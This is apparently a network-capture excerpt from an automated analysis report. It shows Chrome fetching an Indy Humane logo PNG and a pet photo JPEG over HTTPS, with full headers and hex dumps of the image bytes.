                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        37192.168.2.449789192.0.77.394432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:11 UTC394OUTGET /wp-content/uploads/2023/05/Logo_Horiz.png HTTP/1.1
                                                                                                                                                                                                                                                        Host: 149955744.v2.pressablecdn.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC594INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:12 GMT
                                                                                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                                                                                        Content-Length: 10839
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Link: <http://indyhumane.org/wp-content/uploads/2023/05/Logo_Horiz.png>; rel="canonical"
                                                                                                                                                                                                                                                        Last-Modified: Tue, 30 May 2023 00:03:54 GMT
                                                                                                                                                                                                                                                        Expires: Thu, 16 Jan 2025 01:59:12 GMT
                                                                                                                                                                                                                                                        Cache-Control: max-age=604800
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                        X-ac: 2.jfk _atomic_dca MISS
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=15552000
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        X-nc: MISS jfk 1
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC775INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 03 b1 00 00 00 bd 08 06 00 00 00 65 09 fa bf 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 20 00 49 44 41 54 78 da ed dd 4d 6e 22 c9 da f6 f1 ab 4b 35 b7 df 15 98 23 21 31 40 c8 f4 84 a9 b3 26 4c 8b b3 02 53 2b 28 6a 05 85 57 d0 d4 0a 0a af a0 f1 94 49 a5 a7 4c 1a 84 18 20 21 1d bc 82 c7 ac a0 de 41 de d9 4d bb fc c1 47 44 66 64 f2 ff 49 d6 79 9e 73 ca 38 c9 8c 8c 8c 2b 22 32 e2 b7 9f 3f 7f aa 6c 96 d5 c6 b9 a4 8e a4 a6 fd a4 d6 92 a6 92 e2 da 6a 3e 2d f0 f7 6b da f7 8b 9e f9 9f 63 49 a3 22 7f 3f 00 00 00 00 78 c9 6f 65 0a b1 16 5e 07 16 f0 ce de f8 e7 0f 92 fa b5 d5 7c 58 a0 ef d7 95 d4 97 74 b1 c3 3f bf b7 ef 17 53 cc 01 00 00 00 10 62 c3 0b 78 1d 49 c3 1d c2 eb 73 61 b6 57 5b
                                                                                                                                                                                                                                                        Data Ascii: PNGIHDRepHYs.#.#x?v IDATxMn"K5#!1@&LS+(jWIL !AMGDfdIys8+"2?lj>-kcI"?xoe^|Xt?SbxIsaW[
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC1369INData Raw: b5 c1 28 ec af e7 24 92 94 96 b9 47 2b 6b 31 67 06 00 00 00 c0 ab 21 d6 16 f9 e9 4b ba 7e 21 6c 6c 24 8d 24 0d 09 19 3a 5b 56 1b d1 01 e7 21 a2 d8 fd 1d e6 bb 7a 61 54 da ca da 40 d2 a0 b6 9a 3f 72 c6 00 00 00 00 48 5b d3 89 6d db 98 e9 4b 01 36 0d 6e f6 bf ff 58 56 1b b1 8d a0 9d b2 43 be 7f f3 94 4f d8 b2 da e8 2c ab 8d b5 a4 3f f5 fa b4 ea 33 49 5f 25 c5 36 33 00 00 00 00 00 92 10 6b 23 b0 b1 f6 5b 31 f7 ca c2 ec 30 c3 90 b1 2e 41 88 bd 3a d1 f0 5a 59 56 1b b1 85 d7 7d f6 a7 bd 24 c8 02 00 00 00 f8 57 88 95 34 d4 e1 5b be 5c 4b 5a 67 34 2a 1b 5a 88 dd 6b 54 d5 46 bb 43 e3 7d aa ae ad e4 3c 3d 22 c0 5f ea c8 bd 79 01 00 00 00 94 24 c4 da 28 ec b1 a3 83 67 4a 46 65 7d 07 8d d0 de 8d 3c b3 f3 b7 ab 4a 68 05 c0 f7 62 5d cb 6a 63 28 e9 bb 8e df 17 b7 c7 68
                                                                                                                                                                                                                                                        Data Ascii: ($G+k1g!K~!ll$$:[V!zaT@?rH[mK6nXVCO,?3I_%63k#[10.A:ZYV}$W4[\KZg4*ZkTFC}<="_y$(gJFe}<Jhb]jc(h
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC1369INData Raw: 70 b8 35 6a 7c ec 88 ec 4d 6d 35 8f 3c 4e c1 cd 2a 7c f5 0e d9 ba a8 48 65 93 95 8a 01 00 00 00 0f 21 d6 f4 e5 ef dd d2 cc 58 20 6f 2a 79 07 75 df bd 64 bf 29 19 dd 5c 7b 3c be c7 da 6a 1e e9 b0 77 64 ef 25 fd ee 6a 15 e2 9c dd 06 36 8d 58 ca 6e 04 1a 00 00 00 c0 b1 21 d6 46 f5 3a 07 04 bf 10 83 ec a3 05 bd 8a a4 2f 6f 84 f3 07 0b af ff a9 ad e6 99 2d 30 64 c7 f7 1f fb db af 9d f3 8d 92 ad 84 3e d8 e8 eb b4 04 65 71 26 de 17 05 00 00 00 f0 86 f7 3b 04 ab f5 b2 da 88 24 fd 55 86 2f 6c 81 74 60 3f b2 ef b6 6d 9d e7 74 56 fb db 3d 49 bd 65 b5 d1 b4 d0 9d 4e 69 9d da f1 4d 4b 56 0e 7d bd 6f ec c2 23 d5 04 00 00 00 50 a0 10 6b c1 6a ba ac 36 3e 49 fa 5e b6 a0 e0 62 bb 1c 8f c7 36 b5 e0 1a c2 fe a2 1b b9 5d e0 a8 08 01 36 ed 38 70 6a d2 ae c7 02 00 00 00 70 90
                                                                                                                                                                                                                                                        Data Ascii: p5j|Mm5<N*|He!X o*yud)\{<jwd%j6Xn!F:/o-0d>eq&;$U/lt`?mtV=IeNiMKV}o#Pkj6>I^b6]68pjp
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC1369INData Raw: 6b 3a 69 d7 7b 9e 8e 71 f0 46 47 ce 4e 26 ed 7a 94 63 79 9a 49 ea 1d 50 27 54 ac 4e e8 3a a8 03 ff de 33 de 45 dd 6f 65 a7 77 8a cf a5 17 42 45 a4 64 36 a0 4f f7 69 f0 b0 f0 f1 e8 f1 7b b9 6a f7 0c ac 5e a7 dd 73 dc bd d6 b5 73 e1 6b 40 ee 6e eb 59 b4 77 b9 ca 2d c4 2e ab 8d 9e a4 3f 88 2a 04 d9 82 dc cc 2e 6e 94 fb 7d 1a 34 0e 1b 32 69 65 da dd a5 31 63 95 f8 50 6f f7 6a 1f f3 40 ec 87 38 cd d6 82 e4 50 fe 67 50 fc 72 3d 72 0c b1 b1 a3 6b fd 20 a9 93 75 ef b3 a3 7b f3 66 d2 ae f7 43 0d b1 16 5e 7d 6d 37 f7 60 f7 e3 30 e3 fb ec 87 8b ba e4 90 90 98 e5 7d 31 69 d7 7f cb b1 3c a5 6e 2d cc 3e be f1 77 cf ad f1 7f ed e9 d2 ef 74 1c af 94 99 be c7 e7 d2 37 bb 0f 82 7d 65 ca 61 27 96 8b ce 91 58 8e 46 fb 4f a8 dd d3 2b c2 e8 ac 75 e2 77 3d 9e 8b 97 72 c5 de 9d
                                                                                                                                                                                                                                                        Data Ascii: k:i{qFGN&zcyIP'TN:3EoewBEd6Oi{j^ssk@nYw-.?*.n}42ie1cPoj@8PgPr=rk u{fC^}m7`0}1i<n->wt7}ea'XFO+uw=r
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC1369INData Raw: 92 1e 3c fd cd b3 f4 dd 58 2f 23 b1 36 0a cb 7b 67 a7 ad 47 a3 c7 9b a1 b2 99 e5 f0 60 95 df d4 1e 22 db 15 63 53 c9 34 d1 8e fc ad a6 d8 71 58 a1 77 e5 af 17 f7 5e 49 2f 71 3c 69 d7 a7 cf 3c 44 22 fb 2e 3e 8f c1 79 a3 a1 35 5e 7c 13 a3 04 a1 99 d9 fd 3f b5 fb f2 f1 c9 3d 59 b1 b2 d6 f1 50 d6 ce 5a e3 45 67 d2 ae 8f b8 0c b9 c9 6a 5f d7 bf cb d9 76 dd 6f 65 2c ad cf f2 9a 02 7b 67 f5 ed 34 ad 6f ad a1 de f4 5c cf 46 8e c3 80 ef d7 ed 66 4a 46 34 a7 fa 67 54 7f aa 64 66 4c e5 c9 f7 aa d8 f9 0b 79 ba 69 56 5b 0f 3d 5b f6 0b da ee f1 55 ce ee ed 1c 8d b6 9f 41 2f 84 e8 8a dd 93 3d c7 f7 65 47 d2 e8 b7 9f 3f 7f fa 08 b1 43 42 2c 24 fd a7 b6 9a af cb f0 45 5a e3 85 8b 1b e5 7e d2 ae 47 01 1d cf 6b e1 b5 fb b4 02 7f a3 92 1a 78 aa d4 7f 7f 2e 18 1e 70 be d6 1e
                                                                                                                                                                                                                                                        Data Ascii: <X/#6{gG`"cS4qXw^I/q<i<D".>y5^|?=YPZEgj_voe,{g4o\FfJF4gTdfLyiV[=[UA/=eG?CB,$EZ~Gkx.p
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC1369INData Raw: d0 e8 a3 fd 7c 6f 8d 17 33 2b 83 e9 cf e3 73 b3 7c 6c e6 41 c5 b2 61 c7 c3 73 c7 79 88 05 5e c2 bb d2 28 72 88 f5 de d8 9b b4 eb 8f 39 3f f8 40 48 06 10 7e b8 88 39 95 78 85 ef 41 a3 4b fb b9 de 0a ac 59 7f c7 db b4 13 ce e5 74 e2 2b ca 0e 80 12 ca aa e7 fb 9e 53 0d 00 a5 54 e1 14 00 4e f4 d3 ff e3 1d e7 02 00 5e c5 e8 15 00 20 f7 10 9b c1 22 83 40 c8 6e b6 df 71 27 c4 02 00 00 00 00 42 35 9b b4 eb fd ed ff 82 10 0b 00 28 24 d7 cb ff 03 00 80 e0 6c f4 cc 02 c2 84 58 00 40 51 b1 f2 39 00 00 25 0f b0 cf ad a8 4e 88 05 80 d7 45 19 fd 9d 0a a7 1a 00 f0 92 d6 78 91 45 c7 1d 9d 83 08 c5 4c 52 f3 b9 6d 7c 08 b1 c8 0a ab ae 22 0f 45 db 4f ef 82 4b 46 f0 07 c0 f3 e8 15 59 bc 42 c1 6b 1a 08 c1 37 25 23 b0 eb 97 fe 81 cb 7d 62 1f 68 84 01 08 88 ab 55 85 23 df 07 9a
                                                                                                                                                                                                                                                        Data Ascii: |o3+s|lAasy^(r9?@H~9xAKYt+STN^ "@nq'B5($lX@Q9%NExELRm|"EOKFYBk7%#}bhU#
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC1369INData Raw: 84 19 48 1a b9 d8 42 c7 ea e2 a6 92 4e f8 e8 8d e7 fd a5 d7 10 5b 5b cd 1f 97 d5 86 8f 51 0f 14 cb 90 53 00 87 0d 87 ca 31 95 a5 35 98 5d f6 4a 86 ea 63 6b bc e8 4e da f5 a1 87 fb d9 47 a3 2b a4 0e 80 53 30 75 74 0f 44 8e 1a a7 be 66 48 fc 69 01 79 a4 5f 17 90 aa ec d0 50 72 a9 c3 f3 b0 54 5c 5c cf a1 05 8c b2 0f f6 f4 5b e3 45 ec 70 5f 68 da 3d fb b5 7b 62 4f ed 9e 0b 6b 0f fc 61 81 76 ba f5 93 76 f0 ac ad 03 bc a9 7f 8f 9e 56 9e fc 1c 75 6c ef 3d 9d 7c 9f a3 1e 20 c4 e2 f4 0c 74 fc 56 1a 3d 49 7f 9d c0 b9 fa 6e d3 7e d2 87 ca b9 83 50 7b 2a 8d ae b2 73 35 22 d8 6b 8d 17 23 07 8d 53 9f 1d de 67 81 b4 43 d2 73 c5 68 6c 49 9e 45 ad f1 62 7a 4c d9 b7 57 5c fa 2a ff 8a c0 e9 1a 08 69 67 52 6c cf 23 66 e9 95 a7 dd 73 61 3f bf 4c 4f cf a2 53 fa 9d 8f 0f ad ad
                                                                                                                                                                                                                                                        Data Ascii: HBN[[QS15]JckNG+S0utDfHiy_PrT\\[Ep_h={bOkavvVul=| tV=In~P{*s5"k#SgCshlIEbzLW\*igRl#fsa?LOS
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC1369INData Raw: ee 1d 02 62 bf 35 5e a4 c7 51 91 74 f5 4a e5 bf b6 32 b2 ce b2 ac 6c bd 73 96 1e 6b 64 3f 97 07 7e e4 9d 92 a9 43 a3 5d 42 7f 8e d6 8e ea 88 c7 9c ee c9 58 52 64 65 bd 6b 65 6c 9f e7 f4 bd 9d 83 d8 c3 b1 ad 25 75 5b e3 45 6f eb 3e 8c 24 9d 1d 78 2f c6 92 86 fb 76 86 4c da f5 61 6b bc 88 ad 7c 77 0e fc fb 2e ae 73 e8 75 7f 61 ee 03 1b ed 1c b5 c6 8b b4 cc 7f 3c f0 fb c6 f2 b8 f8 d1 0b f5 ea be f7 a8 93 3a d5 7e e7 e9 fd 58 79 a5 8e 9f d9 f5 8c 1d 3c 8f 68 f7 64 b0 d8 9c d5 b9 69 79 6b 6e d5 b9 57 9e 43 eb 34 fd 8e bb d6 cf bf fd fc f9 33 d3 0b b9 ac 36 22 49 3f c8 7e a5 30 ab ad e6 4d 4e 03 8e d1 1a 2f ce 25 35 ad 92 94 92 8d ac 9b f6 c0 5b 6f 35 6a a6 92 a6 79 87 99 d6 78 11 d9 43 7b fb e7 e9 83 36 7d 68 4f 03 0f 5f 59 9f b7 f4 da be 15 08 d7 fb ec 4f d8
                                                                                                                                                                                                                                                        Data Ascii: b5^QtJ2lskd?~C]BXRdekel%u[Eo>$x/vLak|w.sua<:~Xy<hdiyknWC436"I?~0MN/%5[o5jyxC{6}hO_YO
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC481INData Raw: a0 ac de 9d c2 97 b4 51 c9 48 c9 28 25 01 16 00 00 00 00 08 b1 85 09 b2 b7 25 fc 7a 9f 08 b0 00 00 00 00 4e c1 49 4c 27 7e 6a 59 6d 0c 25 5d 97 e0 ab 6c 24 f5 6a ab f9 90 a2 0c 00 00 00 80 10 5b ee 20 db 55 b1 f7 92 65 0f 58 00 00 00 00 27 e7 dd a9 7e 71 1b bd fc af 85 c1 a2 99 49 aa 10 60 01 00 00 00 10 62 4f 2b c8 8e 94 bc 27 fb 50 a0 c3 be 15 5b e8 00 00 00 00 38 51 27 3b 9d 78 5b 81 b6 e0 b9 a9 ad e6 7d 8a 2d 00 00 00 00 42 2c 42 5e f0 69 23 a9 6b 23 c7 00 00 00 00 70 b2 de 71 0a fe 61 db d4 7c 09 ec b0 66 92 9a 04 58 00 00 00 00 20 c4 3e 17 64 07 92 3e 28 8c 05 9f d2 f7 5f d7 5c 19 00 00 00 00 60 3a f1 8b 96 d5 46 45 d2 48 f9 bd 27 fb 89 fd 5f 01 00 00 00 e0 df 18 89 7d 81 8d 7e 46 4a 46 43 b3 f4 20 e9 77 02 2c 00 00 00 00 fc 8a 91 d8 1d 2c ab 8d 9e
                                                                                                                                                                                                                                                        Data Ascii: QH(%%zNIL'~jYm%]l$j[ UeX'~qI`bO+'P[8Q';x[}-B,B^i#k#pqa|fX >d>(_\`:FEH'_}~FJFC w,,


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        38192.168.2.44978813.107.246.454432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC622OUTGET /photos/352/a625a6f1-50ea-4357-b907-a08d636341db.jpg HTTP/1.1
                                                                                                                                                                                                                                                        Host: g.petango.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                        Referer: https://indyhumane.org/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC535INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:12 GMT
                                                                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                                                                        Content-Length: 110502
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Last-Modified: Sun, 17 Nov 2024 02:53:03 GMT
                                                                                                                                                                                                                                                        ETag: 0x8DD06B2F465FC55
                                                                                                                                                                                                                                                        Vary: Origin
                                                                                                                                                                                                                                                        x-ms-request-id: 8542a90a-301e-000f-083a-62bef3000000
                                                                                                                                                                                                                                                        x-ms-version: 2009-09-19
                                                                                                                                                                                                                                                        x-ms-lease-status: unlocked
                                                                                                                                                                                                                                                        x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                                        x-azure-ref: 20250109T015912Z-156796c549bzvrn8hC1EWRary00000000v50000000005a4v
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache: TCP_MISS
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC15849INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff e1 0b bb 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 0e 00 12 01 03 00 01 00 00 00 01 00 00 00 28 01 03 00 01 00 00 00 02 00 00 00 13 02 03 00 01 00 00 00 01 00 00 00 0f 01 02 00 06 00 00 00 b6 00 00 00 10 01 02 00 0e 00 00 00 bc 00 00 00 1a 01 05 00 01 00 00 00 ca 00 00 00 1b 01 05 00 01 00 00 00 d2 00 00 00 31 01 02 00 07 00 00 00 da 00 00 00 32 01 02 00 14 00 00 00 e1 00 00 00 3c 01 02 00 0e 00 00 00 f5 00 00 00 1a 01 05 00 01 00 00 00 03 01 00 00 1b 01 05 00 01 00 00 00 0b 01 00 00 69 87 04 00 01 00 00 00 13 01 00 00 25 88 04 00 01 00 00 00 92 0a 00 00 00 00 00 00 41 70 70 6c 65 00 69 50 68 6f 6e 65 20 31 34 20 50 72 6f 00 48 00 00 00 01 00 00 00 48 00 00 00 01 00 00 00 31 38 2e 30 2e 31 00
                                                                                                                                                                                                                                                        Data Ascii: JFIFHHExifII*(12<i%AppleiPhone 14 ProHH18.0.1
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC16384INData Raw: 74 3d 0f 35 fa 23 e2 af 0f ae b9 34 56 76 d0 24 32 5d 2c 5f 67 53 32 7c d2 33 7a 67 a0 6d bd 07 ad 79 ad cf c3 6f 06 f8 93 e2 7c 3e 38 d1 62 92 4b a8 61 7b 49 d2 48 80 8d dd 0e d3 32 76 65 60 08 07 d3 9e f5 f6 bc 17 95 d7 cd b1 b0 cb e3 37 18 49 fb cf a4 56 ed ff 00 97 99 e0 71 36 65 47 2f c2 4b 14 e3 cd 38 ad 17 56 fa 1e 01 e1 7d 7a 01 71 32 5e 22 c5 35 c4 85 b6 82 70 41 ef fd 2b b0 d5 b5 68 d1 a2 b7 8f 0b fc 47 6f bf ff 00 5a ba cd 63 e1 05 c5 cf 88 ff 00 b4 b4 4d b6 2e 39 68 db 02 26 f5 03 d0 d7 0f e2 75 ba d2 ee 56 c7 5c d3 a4 49 23 5c 09 58 60 e3 d4 30 ed 5f da b8 1c 66 17 2e c1 c7 03 4a 69 46 09 28 fa 23 f9 73 13 43 11 8c c4 bc 55 58 b7 29 3b bf 53 52 d3 52 74 92 15 12 62 2e e4 d5 9d 53 51 1e 64 59 72 a1 49 2c 3d 6b c6 a1 d6 35 19 f5 73 69 66 be 74
                                                                                                                                                                                                                                                        Data Ascii: t=5#4Vv$2],_gS2|3zgmyo|>8bKa{IH2ve`7IVq6eG/K8V}zq2^"5pA+hGoZcM.9h&uV\I#\X`0_f.JiF(#sCUX);SRRtb.SQdYrI,=k5sift
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC16384INData Raw: 37 d2 dd 4c b1 a0 65 52 e1 78 23 bd 42 2d c6 ab a7 ac e2 4f de 42 80 10 dd 00 ff 00 22 b6 f4 3d 02 ee f6 e9 6d 96 d8 5e 09 c1 09 14 72 16 39 c6 41 e3 bf 4f ca b0 93 89 d1 4e 32 67 ad 78 0a cd c7 88 34 e2 91 e5 72 19 c3 c6 5a 32 99 2c c5 80 20 f1 8e 08 23 f0 af ba 3c 19 a2 78 4a 2f 12 dc 36 99 a8 41 76 6e 5d ad 9a de 08 d9 23 b6 6d bb 44 de 69 0c c5 37 b2 f2 a0 30 1f 79 79 15 f0 47 87 26 bc f0 b4 93 8b a1 34 01 b7 46 c5 94 ee 03 a6 06 0f 5d a7 20 73 eb f5 fb 1f e1 45 f6 9b 65 35 8c 3a ce a1 77 7a da d2 98 e4 02 10 c1 95 64 e0 6f 40 a5 64 c9 24 01 c6 38 24 67 15 e3 e3 5b 71 b2 3d 7c 2c 2d ab 3e c4 b7 d7 ec ac 20 f0 f5 c6 b7 6a fa 5e 87 a9 ca ad 63 38 8c f9 6b 19 c0 0f bf 97 90 13 18 1e 60 c1 ce 4f 19 2c 3d 3a c3 5d 92 ef e2 76 bd a6 c5 6a 97 36 77 50 b5 e6
                                                                                                                                                                                                                                                        Data Ascii: 7LeRx#B-OB"=m^r9AON2gx4rZ2, #<xJ/6Avn]#mDi70yyG&4F] sEe5:wzdo@d$8$g[q=|,-> j^c8k`O,=:]vj6wP
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC16384INData Raw: ba 84 77 7c 79 a0 f0 ca d5 9b 6b da 73 36 74 53 c0 bd e4 ec 7d 03 e1 a4 4f f8 45 a0 2b c9 d9 d6 bd 5b 4a 88 ff 00 64 c5 91 90 53 d3 da be 7c d2 fc 48 34 3d 1e de de e2 26 29 9c 13 8e 2b e9 bf 0a 4b 63 ab 78 56 de e2 06 0c 08 c6 01 af b6 c1 e3 a9 54 5e eb b9 e5 d7 c3 ca 32 38 9d 77 c3 36 5a b6 81 3c 33 db f9 88 4b 02 07 04 71 d4 57 cc 5a bf c0 6d 22 2d 42 69 ad ee 0c 5e 63 64 81 27 96 79 f5 07 8a fb dd b4 c8 3c b7 53 c0 26 b1 6f b4 1b 09 e1 1b 80 62 00 ea 2b a2 ab a7 35 69 23 1e 59 1f 99 fe 28 fd 9a 5b 50 94 ec d4 a7 5c 13 80 93 21 af 3a d4 ff 00 65 fd 72 d3 4c 2d 6f 7b 2b ab 2e 57 7c 61 81 1f 55 af d6 3d 57 c2 fa 53 af 99 24 49 c9 fe e0 35 9e fe 15 d1 26 d1 ad bf 77 e5 91 18 1b a3 25 7a 56 7e d6 8c 17 2d 8a e5 93 d4 fc 96 f0 97 c0 4f 17 5d 7c 42 b0 d0 8a
                                                                                                                                                                                                                                                        Data Ascii: w|yks6tS}OE+[JdS|H4=&)+KcxVT^28w6Z<3KqWZm"-Bi^cd'y<S&ob+5i#Y([P\!:erL-o{+.W|aU=WS$I5&w%zV~-O]|B
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC16384INData Raw: 1d 3e 95 f4 b9 45 38 d2 6f 11 2e 87 87 99 49 d5 4a 8a 7b 9e 47 e2 5d 2f c6 56 f6 df da 5a 8e 93 a8 46 f7 48 64 49 25 85 80 e7 92 d9 ea 3e a7 9a e9 34 2f 0e 6a 5e 3b bd f1 76 87 a2 5b 8b bd 76 e6 15 96 de 13 32 47 bb e6 85 d8 ee 62 14 7c a1 ba 9e d5 fa 4f e2 db 8f 03 af 80 2f 34 fd 7a f6 d6 da ce ee 06 59 4d c4 a8 8d b1 87 cd d7 a7 b5 7e 6d bf 89 3c 1b e1 0f da 8f c4 91 59 5e df 5c f8 4a 58 d6 3b 5d 47 4b c4 93 c4 82 31 b5 d7 24 2b 15 75 52 43 75 0a 46 46 6b dd c2 e6 13 c5 4b de 56 3c 5c 66 0e 9e 15 c6 4f 55 7d 7b 9f 60 fc 2e fd 93 6d bc 3f a6 db df f8 bf c3 97 5a e6 aa ca 18 da cc e2 38 a2 3e 98 cf 3f 53 5d e4 7f b0 7d e7 8c be 2c c1 ad cf e2 38 fc 1f a2 79 ca f1 69 fa 7d 80 77 03 39 fb ce d8 03 fe 03 5f 62 fc 3b f8 bf a3 78 d7 f6 68 f0 1f 8d de d6 d3 fb
                                                                                                                                                                                                                                                        Data Ascii: >E8o.IJ{G]/VZFHdI%>4/j^;v[v2Gb|O/4zYM~m<Y^\JX;]GK1$+uRCuFFkKV<\fOU}{`.m?Z8>?S]},8yi}w9_b;xh
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC16384INData Raw: c2 b8 b9 d4 7c 3d a9 c0 ff 00 69 03 73 ad 9b 20 2c 92 e4 f0 a0 e3 69 f5 cd 77 7f b6 27 8f 6e fc 23 a1 78 0b c3 90 cd 25 a5 86 af f6 b9 ee 9d 18 8d ea 92 20 c7 fe 3d c8 ae 73 f6 36 d4 f4 68 ad 3c 5d 60 d3 bc 7e 22 b9 64 91 22 72 a2 27 81 7e 55 d9 df 76 e6 6c fb 11 58 9f b7 15 b4 3a 96 b3 f0 91 2f a4 68 bc b8 35 03 b4 8e 46 64 8b 8f e9 f8 55 d0 c3 c6 9e 5b 2a 92 95 ef ad ba 2d 6d a1 f3 5c 55 8a f6 dc 50 a8 c2 9a 8f 2a b5 fa cb 4b dd fe 48 ad f0 b3 c4 3e 07 be d2 63 be b2 57 49 6d 63 c6 1c 64 f1 c9 fc eb 33 f6 b1 f1 d5 9f 88 3f 66 0d 07 4d b2 91 23 88 eb 28 f2 45 8c 37 ca 87 07 f5 af 17 f0 05 cd ce 81 aa 86 b0 08 2d 98 7c cc e4 05 c7 4c 93 5c e7 c7 7f 12 c1 ab e9 7a 14 16 d1 a0 45 91 d9 a4 8c 7c b2 10 00 38 f5 af 8f 84 f9 b1 71 51 d8 f6 a5 4f 96 83 e6 3e 7e
                                                                                                                                                                                                                                                        Data Ascii: |=is ,iw'n#x% =s6h<]`~"d"r'~UvlX:/h5FdU[*-m\UP*KH>cWImcd3?fM#(E7-|L\zE|8qQO>~
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC12733INData Raw: 31 f8 bb 54 85 ed fc 3b 68 ec 3c 3d 63 20 21 98 63 1f 69 90 7a 91 9d 99 fb ab 93 5e 8f 35 bc 92 da b4 77 30 46 f6 fb 09 8d 24 88 6c 54 c6 37 60 fb 67 1e 82 b7 a5 37 49 59 f5 32 a9 05 51 dd 1d d7 ec b7 f1 4f c3 fe 1c d7 be 2d fc 6b f1 5d f4 30 27 87 fc 0b 25 b6 8e 97 43 0b 2d cc a3 66 d8 c7 72 4b 0e 07 35 f5 87 c1 8f 8a 5e 02 d6 74 dd 05 34 9f 15 da 4f 7f 23 05 8d e6 f9 4f 05 9b 2d 9e 99 61 9e bd eb f2 bb c4 3f 0a a7 f1 4e 85 aa db 78 6e fe 5f 0d 5b 5d a8 26 d6 26 2b 6f 7a 47 2b e6 20 38 07 3c e7 b0 02 b9 0f 05 e9 7e 32 f0 1d d3 68 de 23 d0 ae ee 2c 56 7f 2a 1d 4a cd 4c b1 06 18 3c 32 f3 dc 76 af 3a b6 06 33 e6 9a 96 a7 5c 31 73 8d a1 25 a2 3f a0 fd 33 e2 bd cf 8b 3f 6b 1b 0f 07 f8 6a e2 38 ec b4 8d 31 2e ef 67 8c 93 ba 5e 1b 6f b8 0a 3f 5a f3 bb 48 60 f8
                                                                                                                                                                                                                                                        Data Ascii: 1T;h<=c !ciz^5w0F$lT7`g7IY2QO-k]0'%C-frK5^t4O#O-a?Nxn_[]&&+ozG+ 8<~2h#,V*JL<2v:3\1s%?3?kj81.g^o?ZH`


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        39192.168.2.449790192.0.77.394432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
